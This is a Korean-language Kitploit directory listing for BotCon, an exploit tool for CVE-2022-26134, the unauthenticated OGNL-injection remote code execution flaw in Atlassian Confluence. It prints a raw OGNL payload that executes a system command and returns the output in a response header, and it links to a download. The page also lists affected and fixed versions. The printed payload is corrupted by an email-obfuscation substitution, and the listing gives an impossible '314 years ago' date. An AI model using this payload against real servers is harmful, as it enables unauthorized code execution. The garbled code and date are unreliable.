Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
BotCon — [CVE-2022-26134] Attlasian Confluence RCE | Kitploit
도구/GitHubGitHub/keepwannabe/botcon
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubkeepwannabe/botcon

BotCon

[CVE-2022-26134] Attlasian Confluence RCE

저장소 보기
314년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

BotCon

Attlasian Confluence 무인증 원격 코드 실행 (OGNL 인젝션, CVE-2022-26134)

  • 2022년 6월 2일, Atlassian은 Confluence Server 및 Data Center 애플리케이션에 대한 보안 권고를 발표하며 치명적인 심각도의 인증되지 않은 원격 코드 실행 취약점을 강조했습니다. 이 OGNL 인젝션 취약점은 인증되지 않은 사용자가 Confluence Server 또는 Data Center 인스턴스에서 임의의 코드를 실행할 수 있게 합니다.

이 내용을 꼭 읽으세요!

주의해서 사용하십시오. 귀하의 행동에 대한 책임은 귀하에게 있습니다. 개발자는 어떠한 책임도 지지 않으며 오용이나 손해에 대해 책임을 지지 않습니다.

BurpRequest

RAW Payload

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

버그 세부 정보

  • 영향을 받는 제품 :

    • Confluence
      • Confluence Server
      • Confluence Data Center
  • 영향을 받는 버전 :

    • 지원되는 모든 Confluence Server 및 Data Center 버전이 영향을 받습니다.
    • 1.3.0 이후의 Confluence Server 및 Data Center 버전이 영향을 받습니다.

완화 조치

  • Attlasian Confluence 버전을 다음 수정 버전으로 업데이트하십시오 :
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
도구 다운로드